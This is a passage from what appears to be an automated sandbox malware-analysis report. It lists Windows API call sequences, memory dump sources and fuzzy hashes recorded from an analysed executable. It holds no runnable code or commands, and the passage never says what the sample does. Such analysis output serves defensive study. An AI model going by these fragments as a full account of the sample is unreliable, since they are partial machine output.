                                                                                                                                                                                                                                                                                                        • VariantClear.OLEAUT32(01010354), ref: 0101019D
                                                                                                                                                                                                                                                                                                        • VariantCopy.OLEAUT32(01010354,00000000), ref: 010101A1
                                                                                                                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 010101AB
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3859894641-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: a2910867032f59c9ba58091ee41cc495b50b5e69c3cb61053b6f28ba970b9b76
                                                                                                                                                                                                                                                                                                        • Instruction ID: 5e5374068cb4b4ff9878b2790bce35f90c5bd29d96de37fc1fb3311a70834e52
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a2910867032f59c9ba58091ee41cc495b50b5e69c3cb61053b6f28ba970b9b76
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2151D675600321ABDF20AB649885BADB3A5AF56310F148447F9C6DF29EDB7C9880CB91
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB41EA: _wcslen.LIBCMT ref: 00FB41EF
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB8577: _wcslen.LIBCMT ref: 00FB858A
                                                                                                                                                                                                                                                                                                        • GetOpenFileNameW.COMDLG32(00000058), ref: 01029F2A
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 01029F4B
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 01029F72
                                                                                                                                                                                                                                                                                                        • GetSaveFileNameW.COMDLG32(00000058), ref: 01029FCA
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _wcslen$FileName$OpenSave
                                                                                                                                                                                                                                                                                                        • String ID: X
                                                                                                                                                                                                                                                                                                        • API String ID: 83654149-3081909835
                                                                                                                                                                                                                                                                                                        • Opcode ID: 93cc66ebc7572e5e8fb309e72148f3859d0cab05ce6bd4cb68421b076ddfd3bb
                                                                                                                                                                                                                                                                                                        • Instruction ID: 6fe9b82d4ca046632f955e662e67cf6351d417e621659d6c7a775514be660bf0
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 93cc66ebc7572e5e8fb309e72148f3859d0cab05ce6bd4cb68421b076ddfd3bb
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A0E1A3316043209FD764EF25C881AAABBE5BF84314F04856DF9C98B2A2DB35ED05DF91
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 01026F21
                                                                                                                                                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 0102707E
                                                                                                                                                                                                                                                                                                        • CoCreateInstance.OLE32(01050CC4,00000000,00000001,01050B34,?), ref: 01027095
                                                                                                                                                                                                                                                                                                        • CoUninitialize.OLE32 ref: 01027319
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                                                                                                                                                        • String ID: .lnk
                                                                                                                                                                                                                                                                                                        • API String ID: 886957087-24824748
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00FB24B0
                                                                                                                                                                                                                                                                                                        • BeginPaint.USER32(?,?,?), ref: 00FB1B35
                                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00FB1B99
                                                                                                                                                                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00FB1BB6
                                                                                                                                                                                                                                                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00FB1BC7
                                                                                                                                                                                                                                                                                                        • EndPaint.USER32(?,?,?,?,?), ref: 00FB1C15
                                                                                                                                                                                                                                                                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00FF3287
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB1C2D: BeginPath.GDI32(00000000), ref: 00FB1C4B
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3050599898-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 010211B3
                                                                                                                                                                                                                                                                                                        • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 010211EE
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 0102120A
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 01021283
                                                                                                                                                                                                                                                                                                        • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0102129A
                                                                                                                                                                                                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 010212C8
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3368777196-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0100FBEF,00000000,?,?,00000000,?,00FF39E2,00000004,00000000,00000000), ref: 01048CA7
                                                                                                                                                                                                                                                                                                        • EnableWindow.USER32(?,00000000), ref: 01048CCD
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(FFFFFFFF,00000000), ref: 01048D2C
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?,00000004), ref: 01048D40
                                                                                                                                                                                                                                                                                                        • EnableWindow.USER32(?,00000001), ref: 01048D66
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 01048D8A
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 642888154-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • IsWindowVisible.USER32(?), ref: 010155F9
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 01015616
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0101564E
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 0101566C
                                                                                                                                                                                                                                                                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 01015674
                                                                                                                                                                                                                                                                                                        • _wcsstr.LIBVCRUNTIME ref: 0101567E
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 72514467-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FB55D1,?,?,00FF4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00FB5871
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 010262C0
                                                                                                                                                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 010263DA
                                                                                                                                                                                                                                                                                                        • CoCreateInstance.OLE32(01050CC4,00000000,00000001,01050B34,?), ref: 010263F3
                                                                                                                                                                                                                                                                                                        • CoUninitialize.OLE32 ref: 01026411
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                                                                                                                                                                                                        • String ID: .lnk
                                                                                                                                                                                                                                                                                                        • API String ID: 3172280962-24824748
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 01048740
                                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(00000000,000000F0,?), ref: 01048765
                                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0104877D
                                                                                                                                                                                                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 010487A6
                                                                                                                                                                                                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,0102C1F2,00000000), ref: 010487C6
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00FB24B0
                                                                                                                                                                                                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 010487B1
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$Long$MetricsSystem
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2294984445-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01011900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 01011916
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01011900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 01011922
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01011900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 01011931
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01011900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 01011938
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01011900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0101194E
                                                                                                                                                                                                                                                                                                        • GetLengthSid.ADVAPI32(?,00000000,01011C81), ref: 010120FB
                                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 01012107
                                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0101210E
                                                                                                                                                                                                                                                                                                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 01012127
                                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,01011C81), ref: 0101213B
                                                                                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 01012142
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3008561057-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00FD36E9,00FD3355), ref: 00FD3700
                                                                                                                                                                                                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00FD370E
                                                                                                                                                                                                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00FD3727
                                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,00FD36E9,00FD3355), ref: 00FD3779
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000,00FD4D53,00000000,?,?,00FD68E2,?,?,00000000), ref: 00FE30EB
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FE311E
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FE3146
                                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,00000000), ref: 00FE3153
                                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,00000000), ref: 00FE315F
                                                                                                                                                                                                                                                                                                        • _abort.LIBCMT ref: 00FE3165
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3160817290-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB1F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FB1F87
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB1F2D: SelectObject.GDI32(?,00000000), ref: 00FB1F96
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB1F2D: BeginPath.GDI32(?), ref: 00FB1FAD
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB1F2D: SelectObject.GDI32(?,00000000), ref: 00FB1FD6
                                                                                                                                                                                                                                                                                                        • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 010494AA
                                                                                                                                                                                                                                                                                                        • LineTo.GDI32(?,00000003,00000000), ref: 010494BE
                                                                                                                                                                                                                                                                                                        • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 010494CC
                                                                                                                                                                                                                                                                                                        • LineTo.GDI32(?,00000000,00000003), ref: 010494DC
                                                                                                                                                                                                                                                                                                        • EndPath.GDI32(?), ref: 010494EC
                                                                                                                                                                                                                                                                                                        • StrokePath.GDI32(?), ref: 010494FC
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 43455801-0
                                                                                                                                                                                                                                                                                                        APIs
• GetDC.USER32(00000000), ref: 01015B7C
• GetDeviceCaps.GDI32(00000000,00000058), ref: 01015B8D
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 01015B94
• ReleaseDC.USER32(00000000,00000000), ref: 01015B9C
• MulDiv.KERNEL32(000009EC,?,00000000), ref: 01015BB3
• MulDiv.KERNEL32(000009EC,00000001,?), ref: 01015BC5
Memory Dump Source
• Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
Similarity
• API ID: CapsDevice$Release
• String ID:
• API String ID: 1035833867-0
• Opcode ID: 56513eed210d5a4bbbed56805926a51ba31f1c4e4a311e8429224da7c7b6668f
• Instruction ID: 7f9f985957fa9cab1cb5d4baa7c51136e371db0facd4c4ff13aba0908d2db860
• Opcode Fuzzy Hash: 56513eed210d5a4bbbed56805926a51ba31f1c4e4a311e8429224da7c7b6668f
• Instruction Fuzzy Hash: 1B0144B5A00319BBEB10AFE59D89F4E7FB8EB59751F004065FA45AB284D6759800CF90
APIs
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FB32AF
• MapVirtualKeyW.USER32(00000010,00000000), ref: 00FB32B7
• MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FB32C2
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FB32CD
• MapVirtualKeyW.USER32(00000011,00000000), ref: 00FB32D5
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00FB32DD
Memory Dump Source
• Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
Similarity
• API ID: Virtual
• String ID:
• API String ID: 4278518827-0
• Opcode ID: 435a624fd540feafebe460aa7acdce145525eab215413807240437ec9d2ed94a
• Instruction ID: 34f21c5dc34d188d5aed6811624e576473fddee925cd31b052c539ea5dd945a1
• Opcode Fuzzy Hash: 435a624fd540feafebe460aa7acdce145525eab215413807240437ec9d2ed94a
• Instruction Fuzzy Hash: 8A016CB09017597DE3008F5A8C85B52FFA8FF19354F00415B915C47941C7F5A864CBE5
APIs
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0101F447
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0101F45D
• GetWindowThreadProcessId.USER32(?,?), ref: 0101F46C
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0101F47B
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0101F485
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0101F48C
Memory Dump Source
• Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
Similarity
• API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
• String ID:
• API String ID: 839392675-0
• Opcode ID: 357c7f1aebc1202061e1df4c8874833126ea6d9de869c31ae577eb77aed5ca4a
• Instruction ID: 888df7c57352979503fe938f85bbae72a78288d88eeca09d3f88adf4a10dbe35
• Opcode Fuzzy Hash: 357c7f1aebc1202061e1df4c8874833126ea6d9de869c31ae577eb77aed5ca4a
• Instruction Fuzzy Hash: 10F090B6241158BBE73157929D4EEEF3B7CEFDAB11F000058FA4191084D7A95A01C7B5
APIs
• GetClientRect.USER32(?), ref: 00FF34EF
• SendMessageW.USER32(?,00001328,00000000,?), ref: 00FF3506
• GetWindowDC.USER32(?), ref: 00FF3512
• GetPixel.GDI32(00000000,?,?), ref: 00FF3521
• ReleaseDC.USER32(?,00000000), ref: 00FF3533
• GetSysColor.USER32(00000005), ref: 00FF354D
Memory Dump Source
• Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
Similarity
• API ID: ClientColorMessagePixelRectReleaseSendWindow
• String ID:
• API String ID: 272304278-0
• Opcode ID: e43040ba7cda9106a3fe59a99f60108e18ae5944ac1b854505f75a37d673e06c
• Instruction ID: 23383754ee6c270d77acc3088cf2d5cc2cd95135b6ef934f032e14873cb31c35
• Opcode Fuzzy Hash: e43040ba7cda9106a3fe59a99f60108e18ae5944ac1b854505f75a37d673e06c
• Instruction Fuzzy Hash: BC018B75500109EFDB605FA4DD88BF97BB1FF58320F150120FA5AA21A0CB361E81AF10
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 010121CC
                                                                                                                                                                                                                                                                                                        • UnloadUserProfile.USERENV(?,?), ref: 010121D8
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 010121E1
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 010121E9
                                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 010121F2
                                                                                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 010121F9
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 146765662-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB41EA: _wcslen.LIBCMT ref: 00FB41EF
                                                                                                                                                                                                                                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0101CF99
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 0101CFE0
                                                                                                                                                                                                                                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0101D047
                                                                                                                                                                                                                                                                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0101D075
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
